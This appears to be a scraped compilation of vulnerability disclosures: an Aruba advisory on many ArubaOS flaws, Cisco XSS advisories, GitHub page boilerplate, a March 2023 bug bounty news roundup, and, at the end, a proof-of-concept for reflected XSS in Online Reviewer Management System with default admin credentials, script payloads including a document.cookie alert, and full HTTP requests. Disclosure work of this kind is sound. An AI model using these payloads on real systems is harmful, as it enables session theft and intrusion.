A vulnerability in the ArubaOS web management interface could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2023-002 CVE: CVE-2021-3712, CVE-2023-22747, CVE-2023-22748, CVE-2023-22749, CVE-2023-22750, CVE-2023-22751, CVE-2023-22752, CVE-2023-22753, CVE-2023-22754, CVE-2023-22755, CVE-2023-22756, CVE-2023-22757, CVE-2023-22758, CVE-2023-22759, CVE-2023-22760, CVE-2023-22761, CVE-2023-22762, CVE-2023-22763, CVE-2023-22764, CVE-2023-22765, CVE-2023-22766, CVE-2023-22767, CVE-2023-22768, CVE-2023-22769, CVE-2023-22770, CVE-2023-22771, CVE-2023-22772, CVE-2023-22773, CVE-2023-22774, CVE-2023-22775, CVE-2023-22776, CVE-2023-22777, CVE-2023-22778 Publication Date: 2023-Feb-28 Status: Confirmed Severity: Critical Revision: 1 Title ===== ArubaOS Multiple Vulnerabilities Overview ======== Aruba has released patches for ArubaOS that address multiple security vulnerabilities. Affected Products ================= - - - Aruba Mobility Conductor (formerly Mobility Master) - - - Aruba Mobility Controllers - - - WLAN Gateways and SD-WAN Gateways managed by Aruba Central Affected Software Versions: - ArubaOS 8.6.x.x: 8.6.0.19 and below - ArubaOS 8.10.x.x: 8.10.0.4 and below - ArubaOS 10.3.x.x: 10.3.1.0 and below - SD-WAN 8.7.0.0-2.3.0.x: 8.7.0.0-2.3.0.8 and below Updating a branch of ArubaOS to the version listed in the Resolution section at the end of this advisory resolve all known issues with that branch. The following ArubaOS and SD-WAN software versions that are End of Life are affected by these vulnerabilities and are not patched by this advisory: - - - ArubaOS 6.5.4.x: all - - - ArubaOS 8.7.x.x: all - - - ArubaOS 8.8.x.x: all - - - ArubaOS 8.9.x.x: all - - - SD-WAN 8.6.0.4-2.2.x.x: all Details ======= Multiple Unauthenticated Command Injections in the PAPI Protocol (CVE-2023-22747, CVE-2023-22748, CVE-2023-22749, CVE-2023-22750) --------------------------------------------------------------------- There are multiple command injection vulnerabilities that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system. Internal References: ATLWL-250, ATLWL-316, ATLWL-317, ATLWL-318 Severity: Critical CVSSv3 Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Workaround: Enabling the Enhanced PAPI Security feature using a non-default key will prevent exploitation of this vulnerability. Please contact Aruba Support for any configuration assistance. Unauthenticated Stack-Based Buffer Overflow Vulnerabilities in the PAPI Protocol (CVE-2023-22751, CVE-2023-22752) --------------------------------------------------------------------- There are stack-based buffer overflow vulnerabilities that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks access point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system. Internal Reference: ATLWL-252, ATLWL-331 Severity: Critical CVSSv3 Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Workaround: Enabling the Enhanced PAPI Security feature using a non-default key will prevent exploitation of this vulnerability. Please contact Aruba Support for any configuration assistance. Unauthenticated Buffer Overflow Vulnerabilities in ArubaOS Processes (CVE-2023-22753, CVE-2023-22754, CVE-2023-22755, CVE-2023-22756, CVE-2023-22757) --------------------------------------------------------------------- There are buffer overflow vulnerabilities in multiple underlying operating system processes that could lead to unauthenticated remote code execution by sending specially crafted packets via the PAPI protocol. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system. Internal References: ATLWL-194, ATLWL-269 Severity: High CVSSv3 Overall Score: 8.1 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Haoliang Lu. Resolved Versions: Please note that due the complexity of code changes involved it was not possible to backport changes for these specific vulnerabilities (CVE-2023-22753, CVE-2023-22754, CVE-2023-22755, CVE-2023-22756, CVE-2023-22757) to ArubaOS 8.6.x. Customers using firmware versions in the 8.6.x branch are urged to implement the workaround listed in this section or to upgrade to ArubaOS 8.10.x. Workaround: Enabling the Enhanced PAPI Security feature using a non-default key will prevent exploitation of this vulnerability. Please contact Aruba Support for any configuration assistance. Authenticated Read Buffer Overruns Processing ASN.1 Strings in ArubaOS (CVE-2021-3712) --------------------------------------------------------------------- A vulnerability exists which allows an authenticated attacker to access sensitive information via the ArubaOS web-based management interface. Successful exploitation allows an attacker to gain access to some data in a cleartext format exposing other network infrastructure to further compromise. Internal references: ATLWL-295 Severity: High CVSSv3.1 Overall Score: 7.4 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H Discovery: This vulnerability was discovered and reported by Ingo Schwarze. Workaround: See the Workaround section at the end of this document. Authenticated Remote Command Execution in ArubaOS Web-based Management Interface (CVE-2023-22758, CVE-2023-22759, CVE-2023-22760, CVE-2023-22761) --------------------------------------------------------------------- Authenticated remote command injection vulnerabilities exist in the ArubaOS web-based management interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system. This allows an attacker to fully compromise the underlying operating system on the device running ArubaOS. Internal references: ATLWL-177, ATLWL-265, ATLWL-274, ATLWL-276 Severity: High CVSSv3 Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz), Erik de Jong (bugcrowd.com/erikdejong) and Nikita Abramov via Aruba's Bug Bounty Program. Workaround: Block access to the ArubaOS web-based management interface from all untrusted users. Authenticated Remote Command Execution in the ArubaOS Command Line Interface (CVE-2023-22762, CVE-2023-22763, CVE-2023-22764, CVE-2023-22765, CVE-2023-22766, CVE-2023-22767, CVE-2023-22768, CVE-2023-22769, CVE-2023-22770) --------------------------------------------------------------------- Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system. Internal Reference: ATLWL-103, ATLWL-203, ATLWL-206, ATLWL-221, ATLWL-227, ATLWL-229, ATLWL-240, ATLWL-314, ATLWL-319 Severity: High CVSSv3 Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) and Daniel Jensen (@dozernz) via Aruba's bug bounty program. Workaround: See the Workaround section at the end of this document. Insufficient Session Expiration in ArubaOS Command Line Interface (CVE-2023-22771) --------------------------------------------------------------------- An insufficient session expiration vulnerability exists in the ArubaOS command line interface. Successful exploitation of this vulnerability allows an attacker to keep a session running on an affected device after the removal of impacted account. Internal References: ATLWL-117 Severity: Medium CVSSv3 Overall Score: 6.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by Mitchell Pompe of Netskope. Workaround: Block access to the ArubaOS command line interface from all untrusted users. Authenticated Path Traversal in ArubaOS Web-based Management Interface Allows for Arbitrary File Deletion. (CVE-2023-22772) --------------------------------------------------------------------- An authenticated path traversal vulnerability exists in the ArubaOS web-based management interface. Successful exploitation of this vulnerability results in the ability to delete arbitrary files in the underlying operating system. Internal References: ATLWL-277 Severity: Medium CVSSv3 Overall Score: 6.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Discovery: This vulnerability was discovered and reported by Nikita Abramov via Aruba's Bug Bounty Program. Workaround: Block access to the ArubaOS web-based management interface from all untrusted users. Authenticated Path Traversal in ArubaOS Command Line Interface Allows for Arbitrary File Deletion. (CVE-2023-22773, CVE-2023-22774) --------------------------------------------------------------------- Authenticated path traversal vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to delete arbitrary files in the underlying operating system. Internal References: ATLWL-228, ATLWL-230 Severity: Medium CVSSv3 Overall Score: 6.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Workaround: Block access to the ArubaOS command line interface from all untrusted users. Authenticated Sensitive Information Disclosure in ArubaOS Command Line Interface (CVE-2023-22775) --------------------------------------------------------------------- A vulnerability exists which allows an authenticated attacker to access sensitive information on the ArubaOS command line interface. Successful exploitation could allow access to data beyond what is authorized by the users existing privilege level. Internal Reference: ATLWL-121 Severity: Medium CVSSv3 Overall Score: 6.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N Discovery: This vulnerability was discovered and reported by Erik De Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Workaround: Block access to the ArubaOS command line interface from all untrusted users. Authenticated Remote Path Traversal in ArubaOS Command Line Interface Allows for Arbitrary File Read (CVE-2023-22776) --------------------------------------------------------------------- An authenticated path traversal vulnerability exists in the ArubaOS command line interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files on the underlying operating system, including sensitive system files. Internal references: ATLWL-127 Severity: Medium CVSSv3 Overall Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N Discovery: This vulnerability was discovered and reported by Nicholas Starke of Aruba Threat Labs. Workaround: Block access to the ArubaOS Command Line Interface from all untrusted users. Authenticated Information Disclosure in ArubaOS Web-based Management Interface (CVE-2023-22777) --------------------------------------------------------------------- An authenticated information disclosure vulnerability exists in the ArubaOS web-based management interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files in the underlying operating system. Internal References: ATLWL-275 Severity: Medium CVSSv3 Overall Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N Discovery: This vulnerability was discovered and reported by Nikita Abramov via Aruba's Bug Bounty Program. Workaround: Block access to the ArubaOS web-based management interface from all untrusted users. Authenticated Stored Cross-Site Scripting (CVE-2023-22778) --------------------------------------------------------------------- A vulnerability in the ArubaOS web management interface could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface. Internal Reference: ATLWL-32 Severity: Medium CVSSv3 Overall Score: 4.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N Discovery: This vulnerability was discovered and reported by Phil Purviance (@superevr) via Aruba's Bug Bounty Program. Workaround: See the Workaround section at the end of this document. Resolution ========== PLEASE NOTE - To fully patch the unauthenticated buffer overflow vulnerabilities disclosed above customers must upgrade to the following versions: - ArubaOS 8.10.x.x: 8.10.0.5 and above - ArubaOS 8.11.x.x: 8.11.0.0 and above - ArubaOS 10.3.x.x: 10.3.1.1 and above - SD-WAN 8.7.0.0-2.3.0.x: 8.7.0.0-2.3.0.9 and above Customers who choose to implement the workarounds listed in the Workaround section below should note that all other vulnerabilities listed in this document are addressed by the following versions: - ArubaOS 8.6.x.x: 8.6.0.20 and above - please note that not all issues are fixed in 8.6.x.x. See the Details section above for specific information - ArubaOS 8.10.x.x: 8.10.0.5 and above - ArubaOS 8.11.x.x: 8.11.0.0 and above - ArubaOS 10.3.x.x: 10.3.1.1 and above - SD-WAN 8.7.0.0-2.3.0.x: 8.7.0.0-2.3.0.9 and above Aruba does not evaluate or patch ArubaOS branches that have reached their End of Support (EoS) milestone. For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the communication between Controller/Gateways and Access-Points be restricted either by having a dedicated layer 2 segment/VLAN or, if Controller/Gateways and Access-Points cross layer 3 boundaries, to have firewall policies restricting the communication of these authorized devices. Enabling the Enhanced PAPI Security feature will prevent the PAPI-specific vulnerabilities above from being exploited Vulnerability specific workarounds are listed per vulnerability above. Please note that this advisory contains specific workarounds and patching instructions for critical security vulnerabilities. Contact Aruba Support for any configuration assistance. Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the release date of the advisory. Revision History ================ Revision 1 / 2023-Feb-28 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products and obtaining assistance with security incidents is available at: https://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: https://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2023 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmP1O7QXHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtma3wf/UaegXoxn4E/aljG9pIGUiCUt BqqZP1UrYE4kKfZOCjmapL550Cl5TmDN2PkAQiJNUHGjORM0xc/YxZiPe4gHJ93A vhtd4IZFT1ghTTuQiqddP+b+aZWRk9V+vvSoqih41vqNG9+XufPs1DGQ3ib2g7dU ILX9p3kdPM6jb8HPlB8CPzVtWDgyMT1Szx6zDBbCUm8rN9RM5o21GGFNP30Wd4mE 2tbDye2ca94mOMZKCH2N48zldjC5Ygyq1m33gpcARe/ai0kpg/rqZHrFi6l5PMKE R/eK/tzqjMIm+ObTafTaXnYGO2/uIkSyVUR5Xf+c9uNYq6v0hpkK9OsGyQd9Og== =bxQQ -----END PGP SIGNATURE-----

CVE-2023-22778

A vulnerability in the web-based management interface of Cisco Nexus Dashboard could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.

*   When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Fixed Releases**
    
    At the time of publication, the release information in the following tables was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information.
    
    The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerability that is described in this advisory and which release included the fix for this vulnerability.
    
    Cisco Nexus Dashboard Release
    
    First Fixed Release
    
    Earlier than 2.3(1c)
    
    2.3(1c)
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

CVE-2023-20053: Cisco Security Advisory: Cisco Nexus Dashboard Cross-Site Scripting Vulnerability

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script in the context of the affected interface or access sensitive, browser-based information.

*   When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Fixed Releases**
    
    At the time of publication, the release information in the following tables was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information.
    
    The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerability that is described in this advisory and which release included the fix for this vulnerability.
    
    Cisco ISE Release
    
    First Fixed Release
    
    2.7 and earlier
    
    Not vulnerable
    
    3.1 and earlier
    
    Not vulnerable
    
    3.2
    
    3.2 P1
    
    For instructions on upgrading your device, see the Upgrade Guides located on the Cisco Identity Service Engine support page.
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

CVE-2023-20085: Cisco Security Advisory: Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerability

Cross-site Scripting (XSS) - Stored in GitHub repository flatpressblog/flatpress prior to 1.3.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2023-1103: fixes #178, possible XSS via uploaded XML & MD files · flatpressblog/flatpress@3cc223d

CVE-2023-1104: huntr – Security Bounties for any GitHub repository

SOLDR (System of Orchestration, Lifecycle control, Detection and Response) 1.1.0 allows stored XSS via the module editor.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 6

*   Code
*   Issues 10
*   Pull requests
*   Discussions
*   Actions
*   Projects 1
*   Wiki
*   Security
*   Insights

Permalink

**Comparing changes**

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also .

**Open a pull request**

Create a new pull request by comparing changes across two branches. If you need to, you can also .

_base repository:_ vxcontrol/soldr _base:_ v1.1.0

_head repository:_ vxcontrol/soldr _compare:_ v1.2.0

*   7 commits
*   37 files changed
*   1 contributor

**Commits on Jan 9, 2023**

**Commits on Jan 10, 2023**

CVE-2023-26608: Comparing v1.1.0...v1.2.0 · vxcontrol/soldr

An XSS vulnerability exists within Quest KACE Systems Management Appliance (SMA) through 12.1 that may allow remote injection of arbitrary web script or HTML.

CVE-2022-38220

Active IQ Unified Manager for VMware vSphere, Linux, and Microsoft Windows versions prior to 9.11P1 are susceptible to a vulnerability which allows administrative users to perform a Stored Cross-Site Scripting (XSS) attack.

CVE-2022-23239

New web targets for the discerning hacker

New web targets for the discerning hacker

Belgium became a haven for ethical hackers following the adoption of a nationwide safe harbor agreement last month.

The framework means that well-intentioned security researchers are free from legal jeopardy when they come to report computer security vulnerabilities in any system located in the European country – providing they follow a strict set of conditions and rules of conduct.

The guidelines, announced by the Centre for Cyber Security Belgium, apply to both private and public sector organizations. Belgium is further ahead on the curve, but it’s hoped that the scheme will inspire other countries to follow suit and companies to roll out vulnerability disclosure programs of their own.

In less congenial bug bounty-related news, independent researcher Peter Geissler publicly released the details of a set of vulnerabilities affecting Lexmark printers rather than accepting what he considered a derisory reward. The security bugs – which could be chained together to create a remote code execution attack – have since been fixed.

Another example of researchers baulking at bug bounty conditions came in the disclosure of a web security flaw in a marketing widget from analysts Gartner.

Security researcher Justin Steven wanted to write-up the technical details of a DOM-based cross-site scripting vulnerability in the Gartner Peer Insights widget, but the analyst firm warned the researcher that that it violated the rules of the private bug bounty program.

Steven publicly disclosed technical details of the vulnerability anyway, even though this meant he went without payment for the find.

There was drama aplenty when a new host of popular hacking tool XSS Hunter disclosed telemetry (anonymized statistics about the vulnerabilities unearthed) from security researchers using its version of the utility. Truffle Security faced a privacy backlash from security researchers upset that it was seemingly “peering over their shoulder” and going through their findings.

In response to the criticism, Truffle Security began offering end-to-end encryption as an option to security researchers using its version of XSS Hunter.

**The latest bug bounty programs for March 2023**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**ATG (Enhanced)**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**ATG has raised rewards for medium, high, and critical bugs, and broadened its scope to encompass .atg.se and its subdomains. ATG is a Swedish gaming company that specializes in horse racing.

Check out the ATG bug bounty page for more details

**Bybit**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$20,000

**Outline:  
**The cryptocurrency exchange is paying out between $5,000 and $20,000 for the highest tier of criticality. The sole target in scope is bybit.com.

Check out the Bybit bug bounty page for more details

**Grindr**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**The location-based social networking and dating application for the LGBTQ community cites RCE, arbitrary SQL queries on production databases, and significant authentication bypass flaws as potentially critical bugs.

Check out the Grindr bug bounty page for more details

**Linktree**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$7,500

**Outline:  
**Australian social media tool Linktree, which has 30 million users globally, has put “most” of its assets within the scope of the bug bounty program.

Check out the Linktree bug bounty page for more details

**Malwarebytes**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,000

**Outline:  
**The anti-malware firm is offering payouts of between $50 and $2,000 for confirmed vulnerabilities. Those posing an RCE risk to Malwarebytes’ web properties or customers running its endpoint protection software, or leading to the takeover of AWS cloud infrastructure, will attract the greatest rewards.

Check out the Malwarebytes bug bounty page for more details

**Miro**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**The collaborative whiteboarding platform is offering rewards of up to $3,000. Out of scope assets include Jira Cards by Miro, Miro for Confluence, and Miro for Jira Cloud.

Check out the Miro bug bounty page for more details

**Ninja Kiwi Games**

**Program provider:  
**Intigriti

**Program type:  
**Public

**Max reward:  
**$3,750

**Outline:  
**The New Zealand-based video game developer has launched a second bug bounty program after a successful 2021 forerunner. Ninja Kiwi Games has created the Bloons, Bloons TD, and SAS: Zombie Assault franchises.

Check out the Ninja Kiwi Games bug bounty page for more details

**QNAP**

**Program provider:  
**Independent

**Program type:  
**Public

**Max reward:  
**Undisclosed

**Outline:  
**QNAP, the Taiwanese manufacturer of network-attached storage appliances, has invited hackers to probe its operating systems, applications, and cloud services for vulnerabilities.

Check out the QNAP bug bounty page for more details

**Skinport**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$6,000

**Outline:  
**Skinport, a marketplace for digital in-game items, has launched a program with rewards for critical flaws that open the door to trading or purchase manipulations. Vulnerabilities that result in unauthorized access to project servers or the disclosure of confidential data are also within scope.

Check out the Skinport bug bounty page for more details

**Spin by OXXO**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**In scope are an API plus iOS and Android mobile applications of Spin, a fintech app and payment card from Mexican convenience store chain Oxxo.

Check out the Spin by OXXO bug bounty page for more details

**Xdefi Technologies**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Xdefi, a cross-chain wallet extension for cryptocurrencies and NFTs, has included in the in-scope assets Xdefi Extension (Chromium web extension) and app, with rewards based on severity as per the CVSS (the Common Vulnerability Scoring Standard).

Check out the Xdefi bug bounty page for more details

**Zabbix**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**Zabbix, a vendor which provides open source infrastructure monitoring technologies, is offering up to $1,000 for high severity bugs and $3,000 for critical flaws.

Check out the Zabbix bug bounty page for more information

**Other bug bounty and VDP news this month**

*   Google has expanded its OSS Fuzz code testing service by upgrading its reward program and increasing the number of computing languages covered by the project
*   The search engine giant has also paid out its largest-ever bug bounty – worth a potentially life-changing £500,000 ($605,000) – for an Android\-related vulnerability. Google is staying tight-lipped about the details of the flaw but ITPro has narrowed down the list of possibilities
*   Intel reports that it paid out $935,000 in bug bounties last year. The chip giant’s Intel Product Security Report (pdf) said that it triaged 243 vulnerabilities in 2022, 90 of which were discovered by security researchers and reported through its bug bounty programs. The vendor “engaged 151 researchers last year, more than double compared to the previous three years”, Security Week reports.
*   An in-depth article on the YesWeHack blog by security researchers BitK and SakiiR offers a technical perspective on detecting and exploiting prototype pollution vulnerabilities in JavaScript. The research builds on earlier work by Portswigger’s Gareth Heyes on detecting server-side prototype pollution-type security flaws.
*   Security researcher Mike Takahashi has put together a Twitter thread on the so-hot topic of how AI-powered chatbots such as ChatGPT might be able to assist bug bounty hunters. The social media “brainstorm” by Takahashi is the second part in what might become an ongoing series.

Additional reporting by Adam Bannister

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for February 2023

Bug Bounty Radar // The latest bug bounty programs for March 2023

An issue was discovered in Online Reviewer Management System v1.0. There is a XSS vulnerability via reviewer_0/admins/assessments/course/course-update.php.

Permalink

**Online Reviewer Management System v1.0 by janobe has Cross-site scripting (reflected)**

BUG\_Author: crazychen123

Accessing admin accounts: Username: admin / Password: admin

Vulnerability File: reviewer\_0/admins/assessments/course/course-update.php

Parameter "courseID" (GET), exists XSS vulnerability

Payload1:courseID=1"><script>alert(1111)</script>

#POC：

    GET /reviewer_0/admins/assessments/course/course-update.php?courseID=1%22%3E%3Cscript%3Ealert(1111)%3C/script%3E HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=8004tqeh90ds1l3vr4t60bq179
    Connection: close
    

Payload2:courseID=1"><script>alert(document.cookie)</script>

#POC：

    GET /reviewer_0/admins/assessments/course/course-update.php?courseID=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=8004tqeh90ds1l3vr4t60bq179
    Connection: close

Tag

#xss